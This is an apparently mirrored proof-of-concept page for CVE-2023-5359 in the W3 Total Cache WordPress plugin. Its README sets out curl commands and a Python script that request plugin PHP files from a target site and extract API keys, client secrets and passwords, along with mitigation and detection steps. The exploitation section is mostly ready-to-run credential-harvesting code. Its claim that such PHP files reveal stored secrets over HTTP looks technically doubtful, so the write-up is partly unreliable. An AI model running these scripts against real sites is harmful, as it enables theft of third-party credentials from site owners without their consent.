Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-5359 PoC — W3 Total Cache <= 2.7.5 - Sensitive Credentials Stored in Plaintext

Source
https://github.com/enzocipher/CVE-2023-5359
Associated Vulnerability
Title:W3 Total Cache <= 2.7.5 - Sensitive Credentials Stored in Plaintext (CVE-2023-5359)
Description:The W3 Total Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.5 via Google OAuth API secrets stored in plaintext in the publicly visible plugin source. This can allow unauthenticated attackers to impersonate W3 Total Cache and gain access to user account information in successful conditions. This would not impact the WordPress users site in any way.
Description
CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability Scanner. Detect exposed credentials in W3 Total Cache plugin versions ≤ 2.7.5.
Readme
# CVE-2023-5359 - W3 Total Cache Cleartext Storage Vulnerability

## Description

**CVE-2023-5359** is a cleartext storage vulnerability affecting the WordPress plugin **W3 Total Cache** in versions ≤ 2.7.5. This vulnerability allows remote attackers to access sensitive credentials stored in unencrypted PHP files that are publicly accessible.

## Severity

- **CVSS Score**: 7.5 (High)
- **Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- **Type**: Sensitive Information Exposure

## Technical Vulnerability

### Root Cause
W3 Total Cache stores configuration settings and API credentials in PHP files within the `/wp-content/plugins/w3-total-cache/` directory without adequate protection. These files are accessible via HTTP, exposing:

- API Keys (CloudFlare, Google, etc.)
- Client Secrets
- OAuth Tokens
- External service credentials

### Affected Files
```
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php
```

## Exploitation

### Manual Method
```bash
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done
```

### Automated Script
```python
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"]([^'\"]+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")
```

## Impact

An attacker can obtain:

1. **CloudFlare credentials** - Take control of CDN and DNS
2. **API Keys for external services** - Access external accounts
3. **OAuth Tokens** - Impersonate identity
4. **Cache configurations** - Manipulate served content

## Mitigation

### Immediate Solution
1. **Update** to W3 Total Cache ≥ 2.7.6
2. **Restrict access** to PHP files in the plugins directory
3. **Revoke and regenerate** all exposed credentials

### Secure Configuration
```apache
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>
```

## Detection

### Verification Command
```bash
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"
```

### Compromise Indicators
- Unusual activity in external APIs
- Changes in CloudFlare configurations
- Traffic from unauthorized IPs to connected services

## Example Finding

```
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345
```

## References

- [CVE-2023-5359](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5359)
- [W3 Total Cache Changelog](https://wordpress.org/plugins/w3-total-cache/#developers)
- [WordPress Security Team](https://wordpress.org/support/wordpress-version/version-security/)

## Legal Notice

This repository is for educational purposes and authorized penetration testing only. Malicious use of this information is strictly prohibited.

---

**Found this information useful?** Star the repository!

*Last updated: November 2025*
File Snapshot

 [4.0K]  /data/pocs/8cc184ca3f82f8d828600fdf206a5e4f5fb7bd4a
├── [4.9K]  poc.py
└── [4.0K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →